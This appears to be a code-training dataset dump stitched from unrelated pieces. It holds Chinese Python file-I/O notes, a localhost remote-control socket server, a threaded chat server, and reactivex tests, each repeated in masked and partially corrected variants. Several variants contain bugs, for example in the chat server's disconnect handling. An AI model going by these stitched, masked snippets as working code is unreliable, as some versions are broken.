:通过迭代器访问。\nf.write(\"hello\\n\"):如果要写入字符串以外的数据,先将他转换为字符串。\nf.tell():返回一个整数,表示当前文件指针的位置(就是到文件头的比特数)。\nf.seek(偏移量,[起始位置]):用来移动文件指针。\n偏移量: 单位为比特,可正可负\n起始位置: 0 - 文件头, 默认值; 1 - 当前位置; 2 - 文件尾\nf.close() 关闭文件\n\n\nopen(filename [, mode [, bufsize]])\n打开一个文件,返回一个file对象。 如果文件无法打开,将处罚IOError异常。\n应该使用open()来代替直接使用file类型的构造函数打开文件。\n参数filename表示将要被打开的文件的路径字符串;\n参数mode表示打开的模式,最常用的模式有:'r'表示读文本,'w'表示写文本文件,'a'表示在文件中追加。\nMode的默认值是'r'。\n当操作的是二进制文件时,只要在模式值上添加'b'。这样提高了程序的可移植性。\n可选参数bufsize定义了文件缓冲区的大小。0表示不缓冲;1表示行缓冲;任何其他正数表示使用该大小的缓冲区;\n负数表示使用系统默认缓冲区大小,对于tty设备它往往是行缓冲,而对于其他文件往往完全缓冲。如果参数值被省却。\n使用系统默认值。\n'''\n\nf=open('1.txt','r',encoding='utf-8')\nprint(f.read())\n'''\n输出...\nltf\nzhongguo\nshanxi\nyuncheng\n男\n20\n'''\n\n#参考博客 https://www.cnblogs.com/Devilf/p/8006663.html\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
<|reserved_special_token_0|>
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print('connection')
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print('connection')
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
if __name__ == '__main__':
server = MachineClient('localhost', 8080)
server.start()
<|reserved_special_token_1|>
import socket
from Server.MachineClient.Identification import Identification
from Server.SQL import DataBase
import threading
import time
from Server.Connection.AcceptClients import Accept
from Server.Connection.ConnectionCheck import ConnectionCheck
from Server.Clients_Data import Clients
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print('connection')
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
if __name__ == '__main__':
server = MachineClient('localhost', 8080)
server.start()
<|reserved_special_token_1|>
import socket
from Server.MachineClient.Identification import Identification
from Server.SQL import DataBase
import threading
import time
from Server.Connection.AcceptClients import Accept
from Server.Connection.ConnectionCheck import ConnectionCheck
from Server.Clients_Data import Clients
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(r"C:\Users\user\Documents\RemoteControl\Server\pythonsqlite.db")
self.data = ""
self.clients = Clients()
self.remote_client = []
def connection_check(self):
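        # Poll loop: reconcile the tracked clients with the database every 2 seconds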
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print("connection")
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
# c[1].send()
def accept(self):
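        # Accept incoming client connections forever and record them in self.clients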
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
# connection = threading.Thread(target=self.connection)
# connection.start()
if __name__ == "__main__":
server = MachineClient("localhost", 8080)
server.start()
|
flexible
|
{
"blob_id": "ff1bb2634ffec6181a42c80a4b2a19c2c27a8f9f",
"index": 3136,
"step-1": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n <mask token>\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-4": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-5": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(r\"C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db\")\n self.data = \"\"\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print(\"connection\")\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n # c[1].send()\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n\n accept = threading.Thread(target=self.accept)\n accept.start()\n\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n # connection = threading.Thread(target=self.connection)\n # connection.start()\n\n\nif __name__ == \"__main__\":\n server = MachineClient(\"localhost\", 8080)\n server.start()\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
            index = clients.index(client)
            clients.remove(client)
            client.close()
            name = client_names[index]
            broadcast(f'{name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
        clients.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
server.bind(('', port))
server.listen()
<|reserved_special_token_0|>
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
            index = clients.index(client)
            clients.remove(client)
            client.close()
            name = client_names[index]
            broadcast(f'{name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
        clients.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('SERVER STARTED...')
recieve()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 12321
server.bind(('', port))
server.listen()
client_names = []
clients = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
            index = clients.index(client)
            clients.remove(client)
            client.close()
            name = client_names[index]
            broadcast(f'{name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
        clients.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('SERVER STARTED...')
recieve()
<|reserved_special_token_1|>
import socket
import threading
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 12321
server.bind(('', port))
server.listen()
client_names = []
clients = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
            index = clients.index(client)
            clients.remove(client)
            client.close()
            name = client_names[index]
            broadcast(f'{name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
        clients.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('SERVER STARTED...')
recieve()
<|reserved_special_token_1|>
import socket
import threading
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 12321
server.bind(('', port))
server.listen()
client_names = []
clients = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
            index = clients.index(client)  # parallel lists: same index in client_names
            clients.remove(client)
            client.close()
            name = client_names[index]
            broadcast(f"{name} left the chat!".encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f"Connected with {str(address)}!")
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
        clients.append(client)  # track the socket alongside its name
print(f"Name of the client is {name}")
broadcast(f"{name} joined the chat!".encode("ascii"))
client.send("Connected to the Noob Coder's Server!".encode("ascii"))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print("SERVER STARTED...")
recieve()
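# A minimal matching client for the server above -- a sketch, not part of the
# original record: it follows the handshake the server expects (answer the
# 'YO' prompt with a nickname, then relay chat lines). HOST, PORT and the
# nickname value are illustrative assumptions.
import socket
import threading
HOST, PORT = '127.0.0.1', 12321
nickname = input('Choose a nickname: ')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
def listen():
    while True:
        message = sock.recv(1024).decode('ascii')
        if message == 'YO':
            sock.send(nickname.encode('ascii'))  # answer the name prompt
        else:
            print(message)
threading.Thread(target=listen, daemon=True).start()
while True:
    sock.send(f'{nickname}: {input()}'.encode('ascii'))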
|
flexible
|
{
"blob_id": "f1fbbbe4258d0fb0a43505f4718730934fd595ec",
"index": 1831,
"step-1": "<mask token>\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\n<mask token>\n",
"step-2": "<mask token>\nserver.bind(('', port))\nserver.listen()\n<mask token>\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint('SERVER STARTED...')\nrecieve()\n",
"step-3": "<mask token>\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12321\nserver.bind(('', port))\nserver.listen()\nclient_names = []\nclients = []\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint('SERVER STARTED...')\nrecieve()\n",
"step-4": "import socket\nimport threading\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12321\nserver.bind(('', port))\nserver.listen()\nclient_names = []\nclients = []\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint('SERVER STARTED...')\nrecieve()\n",
"step-5": "import socket\nimport threading\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12321\n\nserver.bind(('', port))\nserver.listen()\n\nclient_names = []\nclients = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f\"{client_name} left the chat!\".encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f\"Connected with {str(address)}!\")\n \n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n\n print(f\"Name of the client is {name}\")\n broadcast(f\"{name} joined the chat!\".encode(\"ascii\"))\n client.send(\"Connected to the Noob Coder's Server!\".encode(\"ascii\"))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\nprint(\"SERVER STARTED...\")\nrecieve()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while t:
a = random.randint(1, 10)
if a not in s:
t = False
<|reserved_special_token_0|>
print(s)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}
t = True
while t:
a = random.randint(1, 10)
if a not in s:
t = False
s[a] = a
print(s)
<|reserved_special_token_1|>
import random
s = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}
t = True
while t:
a = random.randint(1, 10)
if a not in s:
t = False
s[a] = a
print(s)
<|reserved_special_token_1|>
import random
s = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5}
t = True
while t:
a = random.randint(1, 10)
if a not in s:
t = False
s[a] = a
print(s)
|
flexible
|
{
"blob_id": "b9b113bdc5d06b8a7235333d3b3315b98a450e51",
"index": 6562,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\n<mask token>\nprint(s)\n",
"step-3": "<mask token>\ns = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}\nt = True\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\ns[a] = a\nprint(s)\n",
"step-4": "import random\ns = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}\nt = True\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\ns[a] = a\nprint(s)\n",
"step-5": "import random\ns = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5}\nt = True\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\ns[a] = a\nprint(s)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import unittest
from reactivex import interval
from reactivex import operators as ops
from reactivex.testing import ReactiveTest, TestScheduler
from reactivex.testing.marbles import marbles_testing
from reactivex.testing.subscription import Subscription
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class TestSwitchMapIndex(unittest.TestCase):
def test_switch_map_indexed_uses_index(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(300, "a"),
on_next(400, "b"),
on_next(500, "c"),
)
def create_inner(x: str, i: int):
def create_changing(j: int):
return (i, j, x)
return interval(20).pipe(ops.map(create_changing))
def create():
return xs.pipe(ops.switch_map_indexed(project=create_inner))
results = scheduler.start(create, disposed=580)
# (i, j, x): i is the index of the outer emit;
# j is the value of the inner interval;
# x is the value of the outer emission
assert results.messages == [
on_next(320, (0, 0, "a")),
on_next(340, (0, 1, "a")),
on_next(360, (0, 2, "a")),
on_next(380, (0, 3, "a")),
on_next(420, (1, 0, "b")),
on_next(440, (1, 1, "b")),
on_next(460, (1, 2, "b")),
on_next(480, (1, 3, "b")),
on_next(520, (2, 0, "c")),
on_next(540, (2, 1, "c")),
on_next(560, (2, 2, "c")),
]
assert xs.subscriptions == [Subscription(200, 580)]
def test_switch_map_indexed_inner_throws(self):
"""Inner throwing causes outer to throw"""
ex = "ex"
scheduler = TestScheduler()
sources = [
scheduler.create_cold_observable(on_next(100, "a"), on_next(300, "aa")),
scheduler.create_cold_observable(on_next(50, "b"), on_error(120, ex)),
scheduler.create_cold_observable(
on_next(50, "wont happen"), on_error(120, "no")
),
]
xs = scheduler.create_hot_observable(
on_next(
250,
0,
),
on_next(400, 1),
on_next(
550,
2,
),
)
def create_inner(x: int, _i: int):
return sources[x]
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [
on_next(350, "a"),
on_next(450, "b"),
on_error(520, ex),
]
assert sources[0].subscriptions == [Subscription(250, 400)]
assert sources[1].subscriptions == [Subscription(400, 520)]
assert sources[2].subscriptions == []
def test_switch_map_indexed_outer_throws(self):
"""Outer throwing unsubscribes from all"""
ex = "ABC"
scheduler = TestScheduler()
sources = [
scheduler.create_cold_observable(on_next(100, "a"), on_next(300, "aa")),
scheduler.create_cold_observable(on_next(50, "b"), on_error(120, ex)),
scheduler.create_cold_observable(
on_next(50, "wont happen"), on_error(120, "no")
),
]
xs = scheduler.create_hot_observable(
on_next(
250,
0,
),
on_next(400, 1),
on_error(430, ex),
)
def create_inner(x: int, _i: int):
return sources[x]
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [
on_next(350, "a"),
on_error(430, ex),
]
assert sources[0].subscriptions == [Subscription(250, 400)]
assert sources[1].subscriptions == [Subscription(400, 430)]
assert sources[2].subscriptions == []
def test_switch_map_indexed_no_inner(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_completed(500))
# Fake inner which should never be subscribed to
sources = [scheduler.create_cold_observable(on_next(20, 2))]
def create_inner(_x: int, i: int):
return sources[i]
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [on_completed(500)]
assert xs.subscriptions == [Subscription(200, 500)]
assert sources[0].subscriptions == []
def test_switch_map_indexed_inner_completes(self):
"""Inner completions do not affect outer"""
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(300, "d"),
on_next(330, "f"),
on_completed(540),
)
def create_inner(x: str, i: int):
"""An observable which will complete after 40 ticks"""
return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [
on_next(320, (0, 0, "d")),
on_next(350, (1, 0, "f")),
on_next(
370, (1, 1, "f")
), # here the current inner is unsubscribed but not the outer
on_completed(540), # only outer completion affects
]
def test_switch_map_default_mapper(self):
with marbles_testing(timespan=10) as (start, cold, hot, exp):
xs = hot(
" ---a---b------c-----",
{
"a": cold(" --1--2", None, None),
"b": cold(" --1-2-3-4-5|", None, None),
"c": cold(" --1--2", None, None),
},
None,
)
expected = exp(" -----1---1-2-3--1--2", None, None)
result = start(xs.pipe(ops.switch_map_indexed()))
assert result == expected
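# A minimal usage sketch, not part of the test file above: outside the test
# scheduler the project callable still receives (value, index), as the tests
# exercise. With synchronous sources each inner completes before the next
# switch, so nothing is cut off.
import reactivex
from reactivex import operators as ops
reactivex.of('a', 'b', 'c').pipe(
    ops.switch_map_indexed(lambda x, i: reactivex.of((i, x)))
).subscribe(print)
# prints: (0, 'a')  (1, 'b')  (2, 'c')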
|
normal
|
{
"blob_id": "03dd37346ed12bbd66cbebc46fadc37be319b986",
"index": 548,
